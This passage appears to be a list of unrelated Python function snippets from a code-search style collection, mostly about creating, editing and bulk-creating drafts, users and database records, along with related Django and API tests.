e: # nocoverage\n raise JsonableError(e.messages[0])\n\n return {\n \"recipient_id\": recipient_id,\n \"topic\": topic,\n \"content\": content,\n \"last_edit_time\": last_edit_time,\n }", "def drafts(self):\n if 
self._drafts is None:\n if self._initialize_drafts():\n self._save_drafts()\n return self._drafts", "def _initialize_drafts(self):\n drafts = memcache.get('user_drafts:' + self.email)\n if drafts is not None:\n self._drafts = drafts\n ##logging.info('HIT: %s -> %s', self.email, self._drafts)\n return False\n # We're looking for the Issue key id. The ancestry of comments goes:\n # Issue -> PatchSet -> Patch -> Comment.\n issue_ids = set(comment.key().parent().parent().parent().id()\n for comment in gql(Comment,\n 'WHERE author = :1 AND draft = TRUE',\n self.user))\n self._drafts = list(issue_ids)\n ##logging.info('INITIALIZED: %s -> %s', self.email, self._drafts)\n return True", "def create_draft(convo_ID, template_ID):\n # Get response template through helper function.\n # Make an API request to reply to a conversation with the content in that template\n response_template = get_canned_response(template_ID)\n url = \"https://api2.frontapp.com/conversations/\" + convo_ID + \"/drafts\"\n payload = {\n \"body\": response_template[\"body\"],\n \"subject\": response_template[\"subject\"],\n \"author_id\": \"tea_188ud\", # [needs to change later on]\n \"channel_id\": \"cha_14tfp\", # [also will need to be changed for team based settings]\n }\n files = []\n headers = {\"Authorization\": BEARER_TOKEN}\n requests.request(\"POST\", url, headers=headers, json=payload, files=files)", "def do_edit_draft(draft_id: int, draft_dict: Dict[str, Any], user_profile: UserProfile) -> None:\n try:\n draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile)\n except Draft.DoesNotExist:\n raise ResourceNotFoundError(_(\"Draft does not exist\"))\n valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile)\n draft_object.content = valid_draft_dict[\"content\"]\n draft_object.topic = valid_draft_dict[\"topic\"]\n draft_object.recipient_id = valid_draft_dict[\"recipient_id\"]\n draft_object.last_edit_time = valid_draft_dict[\"last_edit_time\"]\n draft_object.save()\n\n event = {\"type\": \"drafts\", \"op\": \"update\", \"draft\": draft_object.to_dict()}\n send_event(user_profile.realm, event, [user_profile.id])", "def create(self, dictionaries):\n \n return self.ep.post(self.endpoint, params=dictionaries)", "def test_bulk_create(self):\n urls = [reverse('api:user-list')]\n data = [\n {\n \"username\": \"newuser1\",\n \"email\": \"newuser1@example.com\",\n \"password\": \"password\"\n },\n {\n \"username\": \"newuser2\",\n \"email\": \"newuser2@example.com\",\n \"password\": \"password\"\n },\n ]\n access = {\n \"forbidden\": [self.admin_client, self.anonymous_client, self.readonly_client, self.custodian_1_client],\n \"allowed\": []\n }\n for client in access['forbidden']:\n for url in urls:\n self.assertIn(\n client.post(url, data, format='json').status_code,\n [status.HTTP_400_BAD_REQUEST, status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN]\n )\n\n for client in access['allowed']:\n for url in urls:\n self.assertEqual(\n client.post(url, data, format='json').status_code,\n status.HTTP_201_CREATED\n )", "def test_get_drafts(self):\n r1 = Recipes.objects.create(chef=self.user, name=\"Recipe 1\", draft=True)\n r2 = Recipes.objects.create(chef=self.user, name=\"Recipe 2\", draft=False)\n\n url = '/0/chefs/%i/drafts' % self.user.pk\n\n resp = self.client.get(url)\n self.assertPermissionDenied(resp)\n\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('drafts', resp.data)\n self.assertEqual(1, 
len(resp.data['drafts']))\n keys = (\"liked\", \"public_url\", \"edit_date\", \"ingredients\", \"shared\", \"tags\", \"commented\",\n \"private\", \"id\", \"chef\", \"reported\", \"nb_shares\", \"added\", \"nb_added\",\n \"nb_comments\", \"draft\", \"commensals\", \"creation_date\", \"nb_likes\", \"name\",\n \"products\", \"prep_time\", \"serves\", \"bought\", \"book_for_sale\", \"description\")\n self.assertEqual(set(keys), set(resp.data['drafts'][0].keys()))\n self.assertEqual(r1.pk, resp.data['drafts'][0]['id'])", "def test_create_with_new_draft(self):\n user1 = User.objects.create(username='reviewer1')\n user2 = User.objects.create(username='reviewer2')\n\n group1 = self.create_review_group(name='group1')\n group2 = self.create_review_group(name='group2')\n\n dep_review_request_1 = self.create_review_request(publish=True)\n dep_review_request_2 = self.create_review_request(publish=True)\n\n review_request = self.create_review_request(\n publish=True,\n bugs_closed='1,20,300',\n commit_id='abc123',\n description_rich_text=True,\n depends_on=[dep_review_request_1, dep_review_request_2],\n rich_text=True,\n target_groups=[group1, group2],\n target_people=[user1, user2],\n testing_done_rich_text=True,\n extra_data={\n 'key': {\n 'values': [1, 2, 3],\n },\n 'mybool': True,\n })\n\n active_file_attachment_1 = self.create_file_attachment(review_request)\n active_file_attachment_2 = self.create_file_attachment(review_request)\n inactive_file_attachment = self.create_file_attachment(review_request,\n active=False)\n\n active_screenshot_1 = self.create_screenshot(review_request)\n active_screenshot_2 = self.create_screenshot(review_request)\n inactive_screenshot = self.create_screenshot(review_request,\n active=False)\n\n # Create the draft.\n draft = ReviewRequestDraft.create(review_request)\n\n # Make sure all the fields are the same.\n self.assertEqual(draft.branch, review_request.branch)\n self.assertEqual(draft.bugs_closed, review_request.bugs_closed)\n self.assertEqual(draft.commit_id, review_request.commit_id)\n self.assertEqual(draft.description, review_request.description)\n self.assertEqual(draft.description_rich_text,\n review_request.description_rich_text)\n self.assertEqual(draft.extra_data, review_request.extra_data)\n self.assertEqual(draft.rich_text, review_request.rich_text)\n self.assertEqual(draft.summary, review_request.summary)\n self.assertEqual(draft.testing_done, review_request.testing_done)\n self.assertEqual(draft.testing_done_rich_text,\n review_request.testing_done_rich_text)\n\n self.assertEqual(list(draft.depends_on.order_by('pk')),\n [dep_review_request_1, dep_review_request_2])\n self.assertEqual(list(draft.target_groups.all()),\n [group1, group2])\n self.assertEqual(list(draft.target_people.all()),\n [user1, user2])\n self.assertEqual(list(draft.file_attachments.all()),\n [active_file_attachment_1, active_file_attachment_2])\n self.assertEqual(list(draft.inactive_file_attachments.all()),\n [inactive_file_attachment])\n self.assertEqual(list(draft.screenshots.all()),\n [active_screenshot_1, active_screenshot_2])\n self.assertEqual(list(draft.inactive_screenshots.all()),\n [inactive_screenshot])\n\n self.assertIsNotNone(draft.changedesc)", "def commit_draft(draft_uuid):\n api_request('post', api_url('drafts', str(draft_uuid), 'commit'))", "def createMultipleDocuments(cred, payload):\n url = cred.base_url + \"documents:commit\"\n data = { 'writes': [] }\n\n for path, fieldData in payload.iteritems():\n pathData = createFirestoreDataObject(cred, path, fieldData)\n 
del pathData['updateMask']\n data['writes'].append(pathData)\n\n makeRequest(cred, url, 'POST', data)", "def bulk_create(cls, cb, approvals):\n url = cls.urlobject.format(cb.credentials.org_key) + \"/_bulk\"\n resp = cb.post_object(url, body=approvals)\n result = resp.json()\n item_list = result.get(\"results\", [])\n return [cls(cb, item[\"id\"], item) for item in item_list]", "def bulk_create():\n logger.info(\"Creating persuasions in bulk\")\n try:\n request_data = json.loads(request.data)\n with concurrent.futures.ThreadPoolExecutor(max_workers=settings.MAX_WORKERS) as executor:\n {executor.submit(PersuasionServices.create, data): data for data in request_data}\n\n return jsonify(\n dict(status=\"success\", message=\"Your request is in the queue, persuasion will create shortly\"))\n except Exception as e:\n logger.error(\"Exception while creating persuasions in bulk - \" + repr(e))\n return jsonify(dict(status=\"failure\", error=repr(e)))", "def fromDict(cls, userDBDict : dict, **kwargs) -> bbUserDB:\n # Instance the new bbUserDB\n newDB = bbUserDB()\n # iterate over all user IDs to spawn\n for id in userDBDict.keys():\n # Construct new bbUsers for each ID in the database\n # JSON stores properties as strings, so ids must be converted to int first.\n newDB.addUserObj(bbUser.bbUser.fromDict(userDBDict[id], id=int(id)))\n return newDB", "def create_test_data(users=5, categories=2, forums=2, topics=1, posts=1):\n create_default_groups()\n create_default_settings()\n\n data_created = {'users': 0, 'categories': 0, 'forums': 0,\n 'topics': 0, 'posts': 0}\n\n # create 5 users\n for u in range(1, users + 1):\n username = \"test%s\" % u\n email = \"test%s@example.org\" % u\n user = User(username=username, password=\"test\", email=email)\n user.primary_group_id = u\n user.activated = True\n user.save()\n data_created['users'] += 1\n\n user1 = User.query.filter_by(id=1).first()\n user2 = User.query.filter_by(id=2).first()\n\n # lets send them a few private messages\n for i in range(1, 3):\n # TODO\n pass\n\n # create 2 categories\n for i in range(1, categories + 1):\n category_title = \"Test Category %s\" % i\n category = Category(title=category_title,\n description=\"Test Description\")\n category.save()\n data_created['categories'] += 1\n\n # create 2 forums in each category\n for j in range(1, forums + 1):\n if i == 2:\n j += 2\n\n forum_title = \"Test Forum %s %s\" % (j, i)\n forum = Forum(title=forum_title, description=\"Test Description\",\n category_id=i)\n forum.save()\n data_created['forums'] += 1\n\n for t in range(1, topics + 1):\n # create a topic\n topic = Topic()\n post = Post()\n\n topic.title = \"Test Title %s\" % j\n post.content = \"Test Content\"\n topic.save(post=post, user=user1, forum=forum)\n data_created['topics'] += 1\n\n for p in range(1, posts + 1):\n # create a second post in the forum\n post = Post()\n post.content = \"Test Post\"\n post.save(user=user2, topic=topic)\n data_created['posts'] += 1\n\n return data_created", "def create_users(self, users_dict, groups, orgs, locations):\n users = {}\n tokens = {}\n for (user_name, user_data) in users_dict.items():\n if user_data == \"staff\":\n users[user_name] = AppUser.objects.create_superuser(\n username=user_name,\n email='{}@test.com'.format(user_name),\n password='abcd1234@')\n else:\n users[user_name] = AppUser.objects.create_user(\n username=user_name,\n email='{}@test.com'.format(user_name),\n password='abcd1234@',\n organization=orgs.get(user_data.get('organization')))\n if 'authorized_locations' in user_data:\n 
for location_name in user_data.get('authorized_locations'):\n location = locations.get(location_name)\n users[user_name].authorized_locations.add(location)\n groups[user_data['group']].user_set.add(\n users[user_name])\n groups[user_data['group']].save()\n\n users[user_name].save()\n if JWT_AUTH:\n payload = JWT_PAYLOAD_HANDLER(users[user_name])\n tokens[user_name] = JWT_ENCODE_HANDLER(payload)\n else:\n tokens[user_name] = Token.objects.create(user=users[user_name])\n tokens[user_name].save()\n return users, tokens", "def create_attendees(event, attendees_dict):\n attendees_list = []\n for record in attendees_dict:\n attendee = Attendee()\n attendee.event = event\n attendee.email = record.get('email', '')\n # Converting camelCase to snake_case\n attendee.response = ''.join(\n i if i.islower() else f'_{i.lower()}' for i\n in record['responseStatus']\n )\n if record.get('self') and record.get('responseStatus') == ACCEPTED:\n event.is_attendee = True\n else:\n attendees_list.append(attendee)\n Attendee.objects.bulk_create(attendees_list)\n event.save()", "def post(self):\n try:\n draft_project_dto = DraftProjectDTO(request.get_json())\n draft_project_dto.user_id = token_auth.current_user()\n draft_project_dto.validate()\n except DataError as e:\n current_app.logger.error(f\"error validating request: {str(e)}\")\n return {\"Error\": \"Unable to create project\", \"SubCode\": \"InvalidData\"}, 400\n\n try:\n draft_project_id = ProjectAdminService.create_draft_project(\n draft_project_dto\n )\n return {\"projectId\": draft_project_id}, 201\n except ProjectAdminServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 403\n except (InvalidGeoJson, InvalidData) as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400", "def test_get_list_published_user_drafts(self):\n story1 = create_story(title=\"Test Story\", summary=\"Test Summary\",\n byline=\"Test Byline\", status='published',\n language=\"en\", author=self.user)\n story2 = create_story(title=\"Test Story 2\", summary=\"Test Summary 2\",\n byline=\"Test Byline 2\", status='draft',\n language=\"en\", author=self.user)\n self.api_client.client.login(username=self.username, password=self.password)\n uri = '/api/0.1/stories/'\n resp = self.api_client.get(uri)\n self.assertValidJSONResponse(resp)\n self.assertEqual(len(self.deserialize(resp)['objects']), 2)\n story_ids = [story['story_id'] for story in self.deserialize(resp)['objects']]\n self.assertIn(story1.story_id, story_ids)\n self.assertIn(story2.story_id, story_ids)", "def test_create_from_dict_no_schema(session): # pylint:disable=unused-argument\n user = User(username='CP1234567',\n keycloak_guid='1b20db59-19a0-4727-affe-c6f64309fd04')\n\n session.add(user)\n session.commit()\n\n result_invitation = InvitationModel.create_from_dict(None, user.id, 'STANDARD')\n\n assert result_invitation is None", "def collect_draft_pick(team_dict):\n team_dict['draft_pick'] = []\n pick_list = DraftPick.objects.filter(owner=team_dict['team'].franchise.id,\n year=team_dict['team'].year)\n for p in pick_list:\n number = ((p.round - 1) * 16) + p.order\n dft_pick = {\n 'pick': p,\n 'number': number,\n }\n team_dict['draft_pick'].append(dft_pick)\n return team_dict", "def get_drafts(self, **kwargs):\n default_kwargs = { \"order\": \"updated_at desc\" }\n default_kwargs.update(kwargs)\n return self.get_messages(statuses=[\"draft\"], **default_kwargs)", "def populate_with_uuids(self, uuids):\n if not self.isAllowedToEdit():\n raise 
Unauthorized(_(\"You are not allowed to add content to this tile\"))\n self.set_limit()\n data_mgr = ITileDataManager(self)\n\n old_data = data_mgr.get()\n if old_data[\"uuids\"] is None:\n # If there is no content yet, just assign an empty dict\n old_data[\"uuids\"] = dict()\n\n uuids_dict = old_data.get(\"uuids\")\n if not isinstance(uuids_dict, dict):\n # Make sure this is a dict\n uuids_dict = old_data[\"uuids\"] = dict()\n\n if uuids_dict and len(uuids_dict) > self.limit:\n # Do not allow adding more objects than the defined limit\n return\n\n order_list = [int(val.get(\"order\", 0)) for val in uuids_dict.values()]\n if len(order_list) == 0:\n # First entry\n order = 0\n else:\n # Get last order position and increment 1\n order_list.sort()\n order = order_list.pop() + 1\n\n for uuid in uuids:\n if uuid not in uuids_dict:\n entry = dict()\n entry[u\"order\"] = six.text_type(order)\n uuids_dict[uuid] = entry\n order += 1\n\n old_data[\"uuids\"] = uuids_dict\n data_mgr.set(old_data)", "async def fill_user_dict(user_dict: dict):\n # TODO: be more careful about name duplication\n raw_db_data = await userdb.get_all_users_with_any(user_dict.keys())\n for row in raw_db_data:\n necrouser = _get_user_from_db_row(row) # type: NecroUser\n\n # Don't insert users that aren't members of the current server\n if necrouser.member is None:\n continue\n\n if necrouser.twitch_name is not None and necrouser.twitch_name.lower() in user_dict:\n user_dict[necrouser.twitch_name.lower()].append(necrouser)\n\n return user_dict", "def post_create(faker_obj, profile_obj, tag_list, num=3):\n for i in range(num):\n obj = faker_obj\n title = obj.sentence(nb_words=random.randint(5, 10))\n author = User.objects.get(id=profile_obj)\n body = \" \".join(obj.paragraphs(nb=random.randint(8, 20)))\n status = \"published\"\n post = Post.objects.create(title=title, author=author, body=body, status=status)\n post.tags.add(\", \".join(random.sample(tag_list, 1)))\n print(\n \"Created post title:'{}' for user '{}'\".format(post.title, author.username)\n )\n create_comment_list(obj, post)", "def user_import_process(request, setting_dict, preview=True, id=''):\n key_list = setting_dict['key'].split(',')\n # key(s)- user field(s) or profile fields(s)? 
that is import to identify\n key_user_list = [key for key in key_list if key in user_field_names]\n key_profile_list = [key for key in key_list if key in profile_field_names]\n\n setting_dict['total'] = request.session[id].get('total', 0)\n setting_dict['count_insert'] = 0\n setting_dict['count_update'] = 0\n setting_dict['count_invalid'] = 0\n\n data_dict_list = request.session[id].get('data_dict_list', [])\n data_dict_list_len = len(data_dict_list)\n\n user_obj_list = []\n invalid_list = []\n\n start = 0\n if not preview:\n finish = start + ROWS_TO_PROCESS\n if finish > data_dict_list_len:\n finish = data_dict_list_len\n else:\n finish = data_dict_list_len\n\n for r in xrange(start, finish):\n user_object_dict = {}\n if not preview:\n user_import_dict = {}\n identity_user_dict = {} # used to look up the User\n identity_profile_dict = {} # used to look up the Profile\n missing_keys = []\n\n data_dict = data_dict_list[r]\n\n missing_keys = [key for key in data_dict.keys()\n if key in key_list\n and data_dict[key] == '']\n\n for key in data_dict.keys():\n user_object_dict[key] = data_dict[key]\n\n if key in key_list and data_dict[key] != '':\n if key in key_user_list:\n identity_user_dict[key] = data_dict[key]\n if key in key_profile_list:\n identity_profile_dict[key] = data_dict[key]\n\n user_object_dict['ROW_NUM'] = data_dict['ROW_NUM']\n\n if missing_keys:\n user_object_dict['ERROR'] = 'Missing key: %s.' % (\n ', '.join(missing_keys))\n user_object_dict['IS_VALID'] = False\n setting_dict['count_invalid'] += 1\n if not preview:\n invalid_list.append({'ROW_NUM': user_object_dict['ROW_NUM'],\n 'ERROR': user_object_dict['ERROR']})\n else:\n user_object_dict['IS_VALID'] = True\n\n # the keys could be the fields in both User and Profile tables\n user = get_user_by_key(identity_user_dict, identity_profile_dict)\n if user:\n if preview:\n user_object_dict['ACTION'] = 'update'\n else:\n user_import_dict['ACTION'] = 'update'\n setting_dict['count_update'] += 1\n\n if preview:\n populate_user_dict(user, user_object_dict, setting_dict)\n else:\n #user = None\n if preview:\n user_object_dict['ACTION'] = 'insert'\n else:\n user_import_dict['ACTION'] = 'insert'\n setting_dict['count_insert'] += 1\n\n if not preview:\n user = do_user_import(request, user,\n user_object_dict,\n setting_dict)\n user_import_dict['user'] = user\n user_import_dict['ROW_NUM'] = user_object_dict['ROW_NUM']\n user_obj_list.append(user_import_dict)\n\n if preview:\n user_obj_list.append(user_object_dict)\n\n if not preview:\n if finish < data_dict_list_len:\n # not finished yet, store some data in the session\n count_insert = request.session[id].get('count_insert', 0) + \\\n setting_dict['count_insert']\n count_update = request.session[id].get('count_update', 0) + \\\n setting_dict['count_update']\n\n setting_dict['is_completed'] = False\n\n for r in xrange(start, finish):\n # remove those already processed rows\n data_dict_list.remove(data_dict_list[0])\n\n d = request.session[id]\n d.update({'is_completed': False,\n 'count_insert': count_insert,\n 'count_update': count_update,\n 'data_dict_list': data_dict_list})\n request.session[id] = d\n else:\n setting_dict['is_completed'] = True\n setting_dict['count_insert'] += request.session[id].get(\n 'count_insert', 0)\n setting_dict['count_update'] += request.session[id].get(\n 'count_update', 0)\n d = request.session[id]\n d.update({'is_completed': True})\n request.session[id] = d\n\n return user_obj_list, invalid_list", "def populate_with_uuids(self, uuids):\n if not 
self.isAllowedToEdit():\n raise Unauthorized(\n _('You are not allowed to add content to this tile'))\n data_mgr = ITileDataManager(self)\n\n old_data = data_mgr.get()\n if old_data['uuids'] is None:\n # If there is no content yet, just assign an empty dict\n old_data['uuids'] = dict()\n\n uuids_dict = old_data.get('uuids')\n if not isinstance(uuids_dict, dict):\n # Make sure this is a dict\n uuids_dict = old_data['uuids'] = dict()\n\n # if uuids_dict and len(uuids_dict) > self.limit:\n # # Do not allow adding more objects than the defined limit\n # return\n\n order_list = [int(val.get('order', 0))\n for key, val in uuids_dict.items()]\n if len(order_list) == 0:\n # First entry\n order = 0\n else:\n # Get last order position and increment 1\n order_list.sort()\n order = order_list.pop() + 1\n\n for uuid in uuids:\n if uuid not in uuids_dict.keys():\n entry = dict()\n entry[u'order'] = unicode(order)\n uuids_dict[uuid] = entry\n order += 1\n\n old_data['uuids'] = uuids_dict\n data_mgr.set(old_data)", "def copy_from_teamusercopy(apps, schema_editor):\n TeamUser = apps.get_model('status', 'TeamUser')\n TeamUserCopy = apps.get_model('status', 'TeamUserCopy')\n\n for teamusercopy in TeamUserCopy.objects.all():\n if TeamUser.objects.filter(team_id=teamusercopy.team_id, user_id=teamusercopy.user_id).count() == 0:\n TeamUser.objects.create(team_id=teamusercopy.team_id, user_id=teamusercopy.user_id)\n print('Created %s %s' % (teamusercopy.team_id, teamusercopy.user_id))\n else:\n print('Already exists... skipping')", "def create_draft(self):\n return Draft(self)", "def create_reservations(payload, user_id):\n error = False\n # get posted data from json request\n body = request.get_json()\n keys = body.keys()\n # if request does not have json body, abort 400\n if body is None:\n abort(400)\n # if json does not have key 'auth0_id', abort 400\n if 'auth0_id' not in keys:\n abort(400)\n # if json does not have key 'reservation', abort 400\n if 'reservations' not in keys:\n abort(400)\n # if auth0_id in body does not match auth0_id in payload, abort 401\n if body['auth0_id'] != payload['sub']:\n abort(401)\n\n # query who is accessing\n access_user = User.query.filter_by(auth0_id=payload['sub']).first()\n # check if user_id in URL matches the access user id\n if user_id != access_user.id:\n raise AuthError({\n 'code': 'Invalid_claims',\n 'description': 'Unauthorized access by user'\n }, 401)\n\n # query clothes and store them in variable \"clothes\"\n if not isinstance(body['reservations'], list):\n abort(400)\n for value in body['reservations']:\n if not isinstance(value, int):\n abort(400)\n # check if all clothes indeed exist\n clothes = []\n for clothes_id in body['reservations']:\n # query clothes\n selection = Clothes.query.get(clothes_id)\n if selection is None:\n abort(404)\n # if that clothes has been already reserved, abort 422\n if selection.status == \"reserved\":\n abort(422)\n clothes.append(selection)\n\n # query user\n user = User.query.get(user_id)\n formatted_user = user.format()\n\n # make reservations\n try:\n reservations = []\n formatted_clothes = []\n for item in clothes:\n new_reservation = Reserve()\n new_reservation.user = user\n new_reservation.clothes = item\n item.status = \"reserved\"\n reservations.append(new_reservation)\n # commit these reservations\n for reservation in reservations:\n reservation.insert()\n formatted_clothes.append(reservation.clothes.format())\n except Exception:\n # rollback all sessions\n for reservation in reservations:\n reservation.rollback()\n 
error = True\n print(sys.exc_info())\n finally:\n # close all sessions\n for reservation in reservations:\n reservation.close_session()\n\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'clothes': formatted_clothes,\n 'user': formatted_user\n })", "def _draft_from_response(data):\n return Draft(\n uuid=UUID(data['uuid']),\n bundle_uuid=UUID(data['bundle_uuid']),\n name=data['name'],\n updated_at=dateutil.parser.parse(data['staged_draft']['updated_at']),\n files={\n path: DraftFile(path=path, **file)\n for path, file in data['staged_draft']['files'].items()\n },\n links={\n name: DraftLinkDetails(\n name=name,\n direct=LinkReference(**link[\"direct\"]),\n indirect=[LinkReference(**ind) for ind in link[\"indirect\"]],\n modified=link[\"modified\"],\n )\n for name, link in data['staged_draft']['links'].items()\n }\n )", "def create_user_emails_sheets_all():\n input_range = \"Sheet1\"\n\n sheetsService = build(\n 'sheets', 'v4', credentials=credentials, cache_discovery=False)\n\n # Empty sheet\n sheetsService.spreadsheets().values().clear(\n spreadsheetId=spreadsheet_id, range=input_range).execute()\n\n # Get all basic users' email\n users = list(User.objects.filter(is_active=True,\n role=\"BU\").values('email', 'username', 'role', 'profile_id'))\n\n # Check their consent status and update accordingly\n subscribers = []\n for user in users:\n if user['profile_id'] != None:\n profile = SubscriberProfile.objects.get(id=user['profile_id'])\n status = profile.consent_status\n if status == \"IMPLIED\" and profile.expired_at < date.today():\n profile.consent_status = \"EXPIRED\"\n profile.save()\n elif status == \"EXPRESSED\" or status == \"IMPLIED\":\n user.pop('profile_id')\n subscribers.append(user)\n # Get newsletter only users' email\n nlusers = list(NLUser.objects.all())\n\n # Check their consent status and update accordingly\n for nluser in nlusers:\n status = nluser.consent_status\n if status == \"IMPLIED\" and nluser.expired_at < date.today():\n nluser.consent_status = \"EXPIRED\"\n nluser.save()\n elif status == \"EXPRESSED\" or status == \"IMPLIED\":\n subscribers.append({\"email\": nluser.email, \"username\": nluser.first_name,\n \"role\": \"NL\"})\n\n # Get all basic users' email\n restaurant_owners = list(\n User.objects.filter(is_active=True, role=\"RO\").values('email', 'username', 'role'))\n\n # Append user info into values (only users that has email verified)\n values = [['Email', 'Username', 'Role']]\n for subscriber in subscribers:\n values.append(list(subscriber.values()))\n for restaurant_owner in restaurant_owners:\n values.append(list(restaurant_owner.values()))\n\n body = {\n 'values': values\n }\n\n try:\n sheetsService.spreadsheets().values().update(spreadsheetId=spreadsheet_id, range=input_range,\n valueInputOption=\"USER_ENTERED\", body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error\n # return None\n\n # Automatically format the sheets\n requests = [\n {\n \"autoResizeDimensions\": {\n \"dimensions\": {\n \"sheetId\": 0,\n \"dimension\": \"COLUMNS\",\n \"startIndex\": 0,\n \"endIndex\": 3\n }\n }\n },\n {\n \"repeatCell\": {\n \"range\": {\n \"sheetId\": 0,\n \"startRowIndex\": 0,\n \"endRowIndex\": 1,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 3\n },\n \"cell\": {\n \"userEnteredFormat\": {\n \"textFormat\": {\n \"bold\": True\n }\n }\n },\n \"fields\": \"userEnteredFormat(textFormat)\"\n }\n }\n ]\n\n body = {\n 'requests': requests\n }\n\n try:\n 
sheetsService.spreadsheets().batchUpdate(\n spreadsheetId=spreadsheet_id, body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error", "def _get_draft(self):\n review_request = self.create_review_request(publish=True)\n return ReviewRequestDraft.create(review_request)", "def post_integrations_actions_drafts(self, body, **kwargs):\n\n all_params = ['body']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method post_integrations_actions_drafts\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `post_integrations_actions_drafts`\")\n\n\n resource_path = '/api/v2/integrations/actions/drafts'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['PureCloud OAuth']\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='Action',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def import_workflows_from_dict(\n self, workflows_dict, validate=True, base_path=''\n ):\n workflow_name2id = {}\n for workflow in iter(workflows_dict.values()):\n\n valid_def = {}\n if validate:\n valid_def = Definition.validate_workflow(workflow)\n if valid_def is False:\n Log.an().error('invalid workflow:\\n%s', yaml.dump(workflow))\n return False\n\n else:\n valid_def = workflow\n\n if not self.add_linked_apps(valid_def, base_path):\n Log.an().error(\n 'cannot add linked apps for workflow: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n if not self.synchronize_workflow_with_db(valid_def):\n Log.an().error(\n 'cannot synchronize workflow with data source: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n # insert workflow record\n workflow_id = self.add_workflow({\n 'name': valid_def['name'],\n 'description': valid_def['description'],\n 'username': valid_def['username'],\n 'inputs': json.dumps(valid_def['inputs']),\n 'apps': json.dumps(valid_def['apps']),\n 'git': valid_def['git'],\n 'parameters': json.dumps(valid_def['parameters']),\n 'final_output': json.dumps(valid_def['final_output']),\n 'public': valid_def['public'],\n 'enable': valid_def['enable'],\n 'test': valid_def['test'],\n 'version': valid_def['version']\n })\n if not workflow_id:\n Log.an().error(\n 'cannot add workflow to data source: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n workflow_name2id[valid_def['name']] = workflow_id\n valid_def['workflow_id'] = workflow_id\n\n # insert steps, create map of steps\n step_name2id = self.import_workflow_steps_from_dict(valid_def)\n if not step_name2id:\n Log.an().error(\n 'cannot add workflow steps to 
database: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n # insert dependency records\n if not self.import_step_depends_from_dict(valid_def, step_name2id):\n Log.an().error(\n 'cannot add workflow step dependencies: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n return workflow_name2id", "def setup_people(access_control_list):\n all_users = set()\n for users in access_control_list.values():\n all_users.update({(user[\"email\"], user[\"name\"]) for user in users})\n\n with factories.single_commit():\n for email, name in all_users:\n factories.PersonFactory(email=email, name=name)", "def _save_drafts(self):\n ##logging.info('SAVING: %s -> %s', self.email, self._drafts)\n memcache.set('user_drafts:' + self.email, self._drafts, 3600)", "def post(self):\n body = request.get_json()\n username = body.get('user')\n user = query_user_by_name(username)\n if user is None:\n return 'User does not exist', 404\n if invalid_user(username):\n return 'Unauthorized User', 401\n book_id = body.get('book_id')\n if query_book_by_id(book_id) is None:\n return 'Book ID not found ' + str(book_id), 409\n new_copy = models.Copy()\n new_copy.parse_body(body)\n new_copy.status = BOOK_COPY_STATUS_AVAILABLE\n db.session.add(new_copy)\n db.session.commit()\n return new_copy.serialize(), 201", "def post(self):\n\n args = self.reqparse.parse_args()\n\n if not args['date']:\n args['date'] = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')\n models.Exercise.create(exercise_user=args['userId'], **args)\n\n user = models.ExerciseUser.get(id=args['userId'])\n\n marshalled_user = marshal(models.ExerciseUser.get(id=args['userId']), user_fields_with_exercises)\n marshalled_user['exercises'] = [marshal(exercise, exercise_fields) for exercise in user.exercises]\n\n return marshalled_user, 201, {'Location': url_for('resources.exercise.user', userId=args['userId'])}", "def test_01_check_to_state_draft_post(self):\r\n cr, uid = self.cr, self.uid\r\n filter_draft = self.create_filter_draft(cr, uid)\r\n self.create_rule(cr, uid, 'on_create')\r\n new_lead_id = self.create_lead_test_1(cr, uid)\r\n new_lead = self.model.browse(cr, uid, new_lead_id)\r\n self.assertEquals(new_lead.state, 'draft')\r\n self.assertEquals(new_lead.user_id.id, self.demo)\r\n self.delete_rules(cr, uid)", "def create_user_emails_sheets_restaurant_owners():\n input_range = \"Sheet1\"\n\n sheetsService = build(\n 'sheets', 'v4', credentials=credentials, cache_discovery=False)\n\n # Empty sheet\n sheetsService.spreadsheets().values().clear(\n spreadsheetId=spreadsheet_id, range=input_range).execute()\n\n # Get all basic users' email\n restaurant_owners = list(User.objects.filter(\n is_active=True, role=\"RO\").values('email', 'username'))\n\n # Append user info into values (only users that has email verified)\n values = [['Email', 'Username']]\n for restaurant_owner in restaurant_owners:\n values.append(list(restaurant_owner.values()))\n\n body = {\n 'values': values\n }\n\n try:\n sheetsService.spreadsheets().values().update(spreadsheetId=spreadsheet_id, range=input_range,\n valueInputOption=\"USER_ENTERED\", body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error\n # 